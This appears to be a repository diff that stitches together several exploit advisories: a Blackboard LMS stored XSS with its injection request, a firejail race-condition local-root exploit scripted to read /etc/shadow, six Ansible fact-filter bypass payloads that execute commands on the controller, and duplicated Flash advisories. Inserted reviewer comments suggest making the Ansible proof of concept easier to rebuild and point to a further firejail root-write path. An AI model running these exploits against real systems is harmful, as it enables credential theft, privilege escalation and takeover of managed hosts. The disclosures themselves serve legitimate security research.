developed by Blackboard Inc. It is Web-based server software which features course management, customizable open architecture, and scalable
design that allows integration with student information systems and authentication protocols. It may be installed on local servers or hosted
by Blackboard ASP Solutions. Its main purposes are to add online elements to courses traditionally delivered face-to-face and to develop
completely online courses with few or no face-to-face meetings.
(Copy of the Homepage: http://www.blackboard.com/learning-management-system/blackboard-learn.aspx )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side input validation vulnerability in the official Blackboard LMS 9.1 SP14.
Vulnerability Disclosure Timeline:
==================================
2017-01-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
BlackBoard Inc.
Product: Blackboard LMS - Content Management System 9.1 SP 14
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered in Blackboard LMS official web-application.
Remote attackers are able to inject malicious code into profile information module, the vulnerability is located in
the first name,last name of user profile, the vulnerable fields in the module (userVO.firstName & userVO.lastName).
The issue allows an attacker to inject own malicious java script codes to the vulnerable modules context. The execution
of the vulnerability occurs in Blackboard LMS main panel & user management module. Due to our investigation we discovered
that users with low privileged access are able to to inject their own java code to compromise other moderator or admin
session credentials. The request method to inject is POST and the attack vector of the issue is persistent. The execute
occurs each time an account visits the profile page of the attacking user account.
The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.2
Exploitation of the web vulnerability requires a low privileged user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external
redirect to malicious sources and application-side manipulation of affected or connected module context.
Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. User register in the blackboard LMS course as student .
2. User goes to profile information section and inject the code persistent payload > into the firstname or lastname input fields
Note: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
3. User submits data and saves it via POST method request with out secure parse by the web validation
4. The execution of vulnerability occurs in the user management:
https://b-lms.localhost:8000/webapps/Bb-sites-enrollment-manager-BBLEARN/enrollmentManager.form?course_id=_431252_1
5. Successfully reproduce the application-side web validation vulnerability!
--- PoC Session Logs [POST] ---
POST /webapps/Bb-sites-user-profile-BBLEARN/profile.form HTTP/1.1
Host: b-lms.localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
Cookie: JSESSIONID=285EAF6ED95FF4574CADF4FF90F218B1; __utma=154552106.1787260759.1470597563.1470597563.1470652392.2;
__utmz=154552106.1470597563.1.1.utmcsr=vulnlab.coursesites.com|utmccn=(referral)|utmcmd=referral|utmcct=/; COOKIE_CONSENT_ACCEPTED=true;
NSC_106969_wjq_69.196.229.208.hspvq=ffffffff090d159545525d5f4f58455e445a4a42378b; session_id=153E1080C32EF7E9393910EC45598887;
s_session_id=FCCF148598E6531BC4167D5C3B8A2949; JSESSIONID=C866524B3CA437DF8E0AC184746DBD36; __utmb=154552106.26.9.1470653164713; __utmc=154552106; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 605
userVO.firstName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.lastName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.user.educationLevel=
Not+Disclosed&userVO.user.gender=Not+Disclosed&birthDate_datetime=&pickdate=&pickname=&birthDate_date=&userVO.user.studentId=&userType=HE_STUDENT
&userVO.user.emailAddress=sec%40secteach.me&userVO.user.street1=&userVO.user.city=&userVO.user.state=&userVO.user.zipCode=&userVO.user.country=AF
&userVO.user.mobilePhone=&userVO.user.homePhone1=&userVO.user.webPage=&userVO.userProfile.institutionGuid=User_Instr_2015-02-22_19%3A31%3A21.304
&userVO.user.jobTitle=&userVO.user.department=&top_Submit=Submit
-
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 08 Aug 2016 11:06:31 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/1.0.1g mod_jk/1.2.37
X-Blackboard-appserver: fgprd-106969-156642-app006.mhint
P3P: CP="CAO PSA OUR"
X-Blackboard-product: Blackboard Learn &#8482; 9.1.140152.0
Set-Cookie: session_id=153E1080C32EF7E9393910EC45598887; Path=/; HttpOnly
Set-Cookie: s_session_id=FCCF148598E6531BC4167D5C3B8A2949; Path=/; Secure; HttpOnly
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Fri, 18 Jul 2014 19:02:32 GMT
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=UTF-8
Reference(s):
https://b-lms.localhost:8000/
https://b-lms.localhost:8000/webapps/
https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/
https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse or encode of the vulnerable firstname and lastname input fields.
Disallow the usage of special chars and filter the entries by an escape. Parse the output context in the profile.form to
prevent application-side executions.
Security Risk:
==============
The security risk of the application-side input validation vulnerabilities in the user profile section is estimated as medium. (CVSS 4.2)
Credits & Authors:
==================
Vulnerability Lab [Research Team] - Lawrence Amer (http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

316
platforms/linux/local/41022.txt Executable file
@ -0,0 +1,316 @@
# firejail advisory for TOCTOU in --get and --put (local root)
Releasing a brief advisory/writeup about a local root privesc found in firejail that we reported back in Nov, 2016. This is in response to a recent [thread](http://seclists.org/oss-sec/2017/q1/20) on oss-sec where people seem interested in details of firejail security issues. This particular vulnerability was fixed in commit [e152e2d](https://github.com/netblue30/firejail/commit/e152e2d067e17be33c7e82ce438c8ae740af6a66) but no CVE was assigned.
## Vulnerability
This is a TOCTOU (race condition) bug when testing access permissions with access() and then calling copy_file(). At the time of discovery, it was clear the code suffered from many insecure coding constructs like this and much more -- but there was no guideline around making security related bug reports (other than using the public issue tracker).
### Code: src/firejail/ls.c
~~~~
void sandboxfs(int op, pid_t pid, const char *path) {
EUID_ASSERT();
// if the pid is that of a firejail process, use the pid of the first child process
EUID_ROOT();
char *comm = pid_proc_comm(pid);
EUID_USER();
if (comm) {
if (strcmp(comm, "firejail") == 0) {
pid_t child;
if (find_child(pid, &child) == 0) {
pid = child;
}
}
free(comm);
}
// check privileges for non-root users
uid_t uid = getuid();
if (uid != 0) {
uid_t sandbox_uid = pid_get_uid(pid);
if (uid != sandbox_uid) {
fprintf(stderr, "Error: permission denied.\n");
exit(1);
}
}
// full path or file in current directory?
char *fname;
if (*path == '/') {
fname = strdup(path);
if (!fname)
errExit("strdup");
}
else if (*path == '~') {
if (asprintf(&fname, "%s%s", cfg.homedir, path + 1) == -1)
errExit("asprintf");
}
else {
fprintf(stderr, "Error: Cannot access %s\n", path);
exit(1);
}
// sandbox root directory
char *rootdir;
if (asprintf(&rootdir, "/proc/%d/root", pid) == -1)
errExit("asprintf");
if (op == SANDBOX_FS_LS) {
EUID_ROOT();
// chroot
if (chroot(rootdir) < 0)
errExit("chroot");
if (chdir("/") < 0)
errExit("chdir");
// access chek is performed with the real UID
if (access(fname, R_OK) == -1) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
// list directory contents
struct stat s;
if (stat(fname, &s) == -1) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
if (S_ISDIR(s.st_mode)) {
char *rp = realpath(fname, NULL);
if (!rp) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
if (arg_debug)
printf("realpath %s\n", rp);
char *dir;
if (asprintf(&dir, "%s/", rp) == -1)
errExit("asprintf");
print_directory(dir);
free(rp);
free(dir);
}
else {
char *rp = realpath(fname, NULL);
if (!rp) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
if (arg_debug)
printf("realpath %s\n", rp);
char *split = strrchr(rp, '/');
if (split) {
*split = '\0';
char *rp2 = split + 1;
if (arg_debug)
printf("path %s, file %s\n", rp, rp2);
print_file_or_dir(rp, rp2, 1);
}
free(rp);
}
}
// get file from sandbox and store it in the current directory
else if (op == SANDBOX_FS_GET) {
// check source file (sandbox)
char *src_fname;
if (asprintf(&src_fname, "%s%s", rootdir, fname) == -1)
errExit("asprintf");
EUID_ROOT();
struct stat s;
if (stat(src_fname, &s) == -1) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
// try to open the source file - we need to chroot
pid_t child = fork();
if (child < 0)
errExit("fork");
if (child == 0) {
// chroot
if (chroot(rootdir) < 0)
errExit("chroot");
if (chdir("/") < 0)
errExit("chdir");
// drop privileges
drop_privs(0);
// try to read the file
if (access(fname, R_OK) == -1) {
fprintf(stderr, "Error: Cannot read %s\n", fname);
exit(1);
}
exit(0);
}
// wait for the child to finish
int status = 0;
waitpid(child, &status, 0);
if (WIFEXITED(status) && WEXITSTATUS(status) == 0);
else
exit(1);
EUID_USER();
// check destination file (host)
char *dest_fname = strrchr(fname, '/');
if (!dest_fname || *(++dest_fname) == '\0') {
fprintf(stderr, "Error: invalid file name %s\n", fname);
exit(1);
}
if (access(dest_fname, F_OK) == -1) {
// try to create the file
FILE *fp = fopen(dest_fname, "w");
if (!fp) {
fprintf(stderr, "Error: cannot create %s\n", dest_fname);
exit(1);
}
fclose(fp);
}
else {
if (access(dest_fname, W_OK) == -1) {
fprintf(stderr, "Error: cannot write %s\n", dest_fname);
exit(1);
}
}
// copy file
EUID_ROOT();
copy_file(src_fname, dest_fname, getuid(), getgid(), 0644);
printf("Transfer complete\n");
EUID_USER();
}
free(fname);
free(rootdir);
exit(0);
}
~~~~
### Code: src/firejail/util.c
~~~~
int copy_file(const char *srcname, const char *destname, uid_t uid, gid_t gid, mode_t mode) {
assert(srcname);
assert(destname);
// open source
int src = open(srcname, O_RDONLY);
if (src < 0) {
fprintf(stderr, "Warning: cannot open %s, file not copied\n", srcname);
return -1;
}
// open destination
int dst = open(destname, O_CREAT|O_WRONLY|O_TRUNC, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
if (dst < 0) {
fprintf(stderr, "Warning: cannot open %s, file not copied\n", destname);
close(src);
return -1;
}
// copy
ssize_t len;
static const int BUFLEN = 1024;
unsigned char buf[BUFLEN];
while ((len = read(src, buf, BUFLEN)) > 0) {
int done = 0;
while (done != len) {
int rv = write(dst, buf + done, len - done);
if (rv == -1) {
close(src);
close(dst);
return -1;
}
done += rv;
}
}
if (fchown(dst, uid, gid) == -1)
errExit("fchown");
if (fchmod(dst, mode) == -1)
errExit("fchmod");
close(src);
close(dst);
return 0;
}
</snip>
~~~~
## Testing
### Our Dockerfile
~~~~
FROM ubuntu:latest
ENV wdir /root/firejail
RUN apt-get update && apt-get install -y git gcc make
RUN useradd -ms /bin/bash daniel && echo "daniel:password" | chpasswd
RUN git clone https://github.com/netblue30/firejail.git ${wdir}
WORKDIR ${wdir}
RUN git reset --hard 81467143ee9c47d9c90e97fb55baf2d47702d372
RUN ./configure && make && make install
~~~~
### Our exploit
This will exploit the --get command to read /etc/shadow and print back to the console. Just copy and paste into your shell:
~~~~
#dropper
cat > gexp.sh <<GUEST_JAIL_SCRIPT_EOF
mkdir -p /tmp/exploit
cat > /tmp/exploit/gaolbreak.c <<TOCTOU_POC_END
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char **argv)
{
char *fl = "/etc/shadow";
if(argc > 1) {
fl = argv[1];
}
while(1) {
int fd = open("owned", O_CREAT | O_RDWR, 0777);
if(fd == -1) {
perror("open");
exit(1);
}
close(fd);
remove("owned");
symlink(fl, "owned");
remove("owned");
}
}
TOCTOU_POC_END
cd /tmp/exploit
gcc ./gaolbreak.c -o gaolbreak
# XXX: change argv[1] to whatever you want
./gaolbreak /etc/shadow
GUEST_JAIL_SCRIPT_EOF
# run the dropper (symlink attack) in a jail
chmod +x ./gexp.sh
firejail --noprofile --force --name=el ./gexp.sh &
# win race using the vulnerable 'firejail --get' command.
mkdir exploitel
cd exploitel
while [ 1 ] ; do nice -n 19 firejail --get=$(pgrep -f '^firejail.*--name=el' -n) /tmp/exploit/owned >/dev/null 2>&1; cat owned 2>/dev/null; done
~~~~
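Review bot: The readability check and the actual read resolve the path twice under different identities: the `access(fname, R_OK)` runs in a forked child after `chroot(rootdir)` and `drop_privs(0)`, while the read is `open(srcname, O_RDONLY)` in copy_file, executed with EUID root on `/proc/<pid>/root/<path>` from the parent, so whatever the sandboxed process swaps in between is followed as root — which is exactly the regular-file-to-symlink flip the PoC loops on. A sound fix keeps check and use on one descriptor: open the source in that same unprivileged child (`int fd = open(fname, O_RDONLY);` after `drop_privs(0)`), hand the fd back to the parent instead of an exit status, and copy from it, so root never opens a sandbox-controlled path. The destination side has the same check-then-use shape: `access(dest_fname, W_OK)` as the real user, then copy_file's root-privileged `open(destname, O_CREAT|O_WRONLY|O_TRUNC, ...)` on a file in the caller's current directory — that looks like it would also give a root-privileged truncating write to a host path if `owned` is replaced by a symlink there, which the advisory does not cover. It would help to state whether the referenced fix commit addresses both directions.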

260
platforms/linux/remote/41013.txt Executable file

@ -0,0 +1,260 @@
########### Computest security advisory CT-2017-0109 #############
Summary: Command execution on Ansible controller from host
Affected software: Ansible
CVE: CVE-2016-9587
Reference URL: https://www.computest.nl/advisories/
CT-2017-0109_Ansible.txt
Affected versions: < 2.1.4, < 2.2.1
Credit: Undisclosed at Computest (research@computest.nl)
Date of publication: January 9, 2017
During a summary code review of Ansible, Computest found and exploited several
issues that allow a compromised host to execute commands on the Ansible
controller and thus gain access to the other hosts controlled by that
controller.
This was not a full audit and further issues may or may not be present.
About Ansible
-------------
"Ansible is an open-source automation engine that automates cloud provisioning,
configuration management, and application deployment. Once installed on a
control node, Ansible, which is an agentless architecture, connects to a managed
node through the default OpenSSH connection type."
- wikipedia.org
Technical Background
--------------------
A big threat to a configuration management system like Ansible, Puppet, Salt
Stack and others, is compromise of the central node. In Ansible terms this is
called the Controller. If the Controller is compromised, an attacker has
unfettered access to all hosts that are controlled by the Controller. As such,
in any deployment, the central node receives extra attention in terms of
security measures and isolation, and threats to this node are taken even more
seriously.
Fortunately for team blue, in the case of Ansible the attack surface of the
Controller is pretty small. Since Ansible is agent-less and based on push, the
Controller does not expose any services to hosts.
A very interesting bit of attack surface though is in the Facts. When Ansible
runs on a host, a JSON object with Facts is returned to the Controller. The
Controller uses these facts for various housekeeping purposes. Some facts have
special meaning, like the fact "ansible_python_interpreter" and
"ansible_connection". The former defines the command to be run when Ansible is
looking for the python interpreter, and the second determines the host Ansible
is running against. If an attacker is able to control the first fact he can
execute an arbitrary command, and if he is able to control the second fact he is
able to execute on an arbitrary (Ansible-controlled) host. This can be set to
"local" to execute on the Controller itself.
Because of this scenario, Ansible filters out certain facts when reading the
facts that a host returns. However, we have found 6 ways to bypass this filter.
In the scenarios below, we will use the following variables:
PAYLOAD = "touch /tmp/foobarbaz"
# Define some ways to execute our payload.
LOOKUP = "lookup('pipe', '%s')" % PAYLOAD
INTERPRETER_FACTS = {
# Note that it echoes an empty dictionary {} (it's not a format string).
'ansible_python_interpreter': '%s; cat > /dev/null; echo {}' % PAYLOAD,
'ansible_connection': 'local',
# Become is usually enabled on the remote host, but on the Ansible
# controller it's likely password protected. Disable it to prevent
# password prompts.
'ansible_become': False,
}
Bypass #1: Adding a host
------------------------
Ansible allows modules to add hosts or update the inventory. This can be very
useful, for instance when the inventory needs to be retrieved from a IaaS
platform like as the AWS module does.
If we're lucky, we can guess the inventory_hostname, in which case the host_vars
are overwritten [2] and they will be in effect at the next task. If host_name
doesn't match inventory_hostname, it might get executed in the play for the next
hostgroup, also depending on the limits set on the commandline.
# (Note that when data["add_host"] is set,
# data["ansible_facts"] is ignored.)
data['add_host'] = {
# assume that host_name is the same as inventory_hostname
'host_name': socket.gethostname(),
'host_vars': INTERPRETER_FACTS,
}
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L447
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L580
Bypass #2: Conditionals
-----------------------
Ansible actions allow for conditionals. If we know the exact contents of a
"when" clause, and we register it as a fact, a special case checks whether the
"when" clause matches a variable [1]. In that case it replaces it with its
contents and evaluates [2] them.
# Known conditionals, separated by newlines
known_conditionals_str = """
ansible_os_family == 'Debian'
ansible_os_family == "Debian"
ansible_os_family == 'RedHat'
ansible_os_family == "RedHat"
ansible_distribution == "CentOS"
result|failed
item > 5
foo is defined
"""
known_conditionals = [x.strip() for x in known_conditionals_str.split('\n')]
for known_conditional in known_conditionals:
data['ansible_facts'][known_conditional] = LOOKUP
[1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L118
[2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L125
Bypass #3: Template injection in stat module
--------------------------------------------
The template module/action merges its results with those of the stat module.
This allows us to bypass [1][2][3] the stripping of magic variables from
ansible_facts [4], because they're at an unexpected location in the result tree.
data.update({
'stat': {
'exists': True,
'isdir': False,
'checksum': {
'rc': 0,
'ansible_facts': INTERPRETER_FACTS,
},
}
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L39
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L49
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L146
# [4] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/__init__.py#L678
Bypass #4: Template injection by changing jinja syntax
------------------------------------------------------
Remote facts always get quoted. Set_fact unquotes them by evaluating them.
UnsafeProxy was designed to defend against unquoting by transforming jinja
syntax into jinja comments, effectively disabling injection.
Bypass the filtering of "{{" and "{%" by changing the jinja syntax [1][2]. The
{{}} is needed to make it look like a variable [3]. This works against:
- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': "#jinja2:variable_start_string:'[[',variable_end_string:']]',block_start_string:'[%',block_end_string:'%]'\n{{}}\n[[ansible_host]][[lookup('pipe', '" + PAYLOAD + "')]]",
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L66
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L469
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L308
Bypass #5: Template injection in dict keys
------------------------------------------
Strings and lists are properly cleaned up, but dictionary keys are not [1]. This
works against:
- set_fact: foo="some prefix {{ansible_os_family}} and/or suffix"
- command: echo "{{foo}}
The prefix and/or suffix are needed in order to turn the
dict into a string, otherwise the value would remain a dict.
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': { "{{ %s }}" % LOOKUP: ''},
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/vars/unsafe_proxy.py#L104
Bypass #6: Template injection using safe_eval
---------------------------------------------
There's a special case for evaluating strings that look like a list or dict [1].
Strings that begin with "{" or "[" are evaluated by safe_eval [2]. This allows
us to bypass the removal of jinja syntax [3]: we use the whitelisted Python to
re-create a bit of Jinja template that is interpreted.
This works against:
- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': """[ '{'*2 + "%s" + '}'*2 ]""" % LOOKUP,
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L334
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/safe_eval.py
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L229
Issue: Disabling verbosity
--------------------------
Verbosity can be set on the controller to get more debugging information. This
verbosity is controlled through a custom fact. A host however can overwrite this
fact and set the verbosity level to 0, hiding exploitation attempts.
data['_ansible_verbose_override'] = 0
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L99
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L208
Issue: Overwriting files
------------------------
Roles usually contain custom facts that are defined in defaults/main.yml,
intending to be overwritten by the inventory (with group and host vars). These
facts can be overwritten by the remote host, due to the variable precedence [1].
Some of these facts may be used to specify the location of a file that will be
copied to the remote host. The attacker may change it to /etc/passwd. The
opposite is also true, he may be able to overwrite files on the Controller. One
example is the usage of a password lookup with where the filename contains a
variable [2].
[1] http://docs.ansible.com/ansible/playbooks_variables.html#variable-precedence-where-should-i-put-a-variable
[2] http://docs.ansible.com/ansible/playbooks_lookups.html#the-password-lookup
Mitigation
----------
Computest is not aware of mitigations short of installing fixed versions of the
software.
Resolution
----------
Ansible has released new versions that fix the vulnerabilities described in
this advisory: version 2.1.4 for the 2.1 branch and 2.2.1 for the 2.2 branch.
Conclusion
----------
The handling of Facts in Ansible suffers from too many special cases that allow
for the bypassing of filtering. We found these issues in just hours of code
review, which can be interpreted as a sign of very poor security. However, we
don't believe this is the case.
The attack surface of the Controller is very small, as it consists mainly of the
Facts. We believe that it is very well possible to solve the filtering and
quoting of Facts in a sound way, and that when this has been done, the
opportunity for attack in this threat model is very small.
Furthermore, the Ansible security team has been understanding and professional
in their communication around this issue, which is a good sign for the handling
of future issues.
Timeline
--------
2016-12-08 First contact with Ansible security team
2016-12-09 First contact with Redhat security team (secalert@redhat.com)
2016-12-09 Submitted PoC and description to security@ansible.com
2016-12-13 Ansible confirms issue and severity
2016-12-15 Ansible informs us of intent to disclose after holidays
2017-01-05 Ansible informs us of disclosure date and fix versions
2017-01-09 Ansible issues fixed version
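Review bot: The bypass snippets index `data['ansible_facts']` (Bypass #2, #4, #5, #6), set `data['add_host']` and call `socket.gethostname()` without ever saying what `data` is or where it is initialised, so a reader reconstructing the PoC has to guess; the Technical Background does say a JSON object of facts is returned to the Controller, so presumably `data` is the result dict the compromised host's module returns. A one-line comment ahead of Bypass #1 would settle it: `# data = the JSON result dict our (malicious) module returns to the controller; start from data = {'ansible_facts': {}} and import socket`. It is also worth spelling out in the INTERPRETER_FACTS comment that `ansible_connection: 'local'` is the key that turns a controlled `ansible_python_interpreter` into execution on the Controller rather than on the host, since the Technical Background explains this but the dict itself only documents the `ansible_become` line.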


@ -0,0 +1,65 @@
Source: https://cosig.gouv.qc.ca/en/cosig-2017-01-en/
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 24.0.0.186 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: January 10, 2017
# CVE-2017-2930
# COSIG-2016-35
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created
on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio.
Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia
and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-11-13: Francis Provencher of COSIG report this vulnerability to Adobe PSIRT;
2016-11-14: Adobe PSIRT confirm this vulnerability;
2017-01-10: Adobe publish a patch (APSB17-02);
2017-01-10: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, an attacker is able to create an “out of bound” memory corruption. A file with an “ActionRecord”
structure that contain an invalid value in “ActionGetURL2” could lead to remote code execution in the context of the current user.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41008.zip
####################################################################################
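Review bot: The identifier line `# COSIG-2016-35` disagrees with the Source URL (`cosig-2017-01-en`) and the PoC archive name (`COSIG-2017-01.zip`) in the same file, so one of the references is wrong; given the published page and archive both say 2017-01, the header should presumably read `# COSIG-2017-01`. Section 2 is headed "Rapport de Coordination" while the table of contents lists it as "Report Timeline"; use one title. Technical details names only "ActionRecord" / "ActionGetURL2" and "an invalid value", so a triager has nothing beyond the zip to locate the fault; a sentence naming the offending field or the crashing call site, if COSIG has it, would make the entry usable without the sample.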


@ -0,0 +1,65 @@
Source: https://cosig.gouv.qc.ca/en/cosig-2017-01-en/
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 24.0.0.186 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: January 10, 2017
# CVE-2017-2930
# COSIG-2016-35
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created
on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio.
Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia
and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-11-13: Francis Provencher of COSIG report this vulnerability to Adobe PSIRT;
2016-11-14: Adobe PSIRT confirm this vulnerability;
2017-01-10: Adobe publish a patch (APSB17-02);
2017-01-10: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, an attacker is able to create an “out of bound” memory corruption. A file with an “ActionRecord”
structure that contain an invalid value in “ActionGetURL2” could lead to remote code execution in the context of the current user.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41012.zip
####################################################################################
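Review bot: Apart from the mirror link (41012.zip instead of 41008.zip) this entry repeats the preceding COSIG-2017-01 advisory verbatim — same CVE-2017-2930, same APSB17-02 timeline, same technical details — so nothing tells a reader why it exists. If the archive holds a second crash sample for the same bug, say so in the header, e.g. `# Note: second PoC sample for CVE-2017-2930 (APSB17-02); the first is in the COSIG-2017-01 entry above`; if not, this is a duplicate entry. The `# COSIG-2016-35` vs 2017-01 identifier mismatch is carried over unchanged.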


@ -0,0 +1,69 @@
For those who only care about one thing: [the PoC is here.](https://rol.im/kpwned.zip)
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41021.zip
## Overview
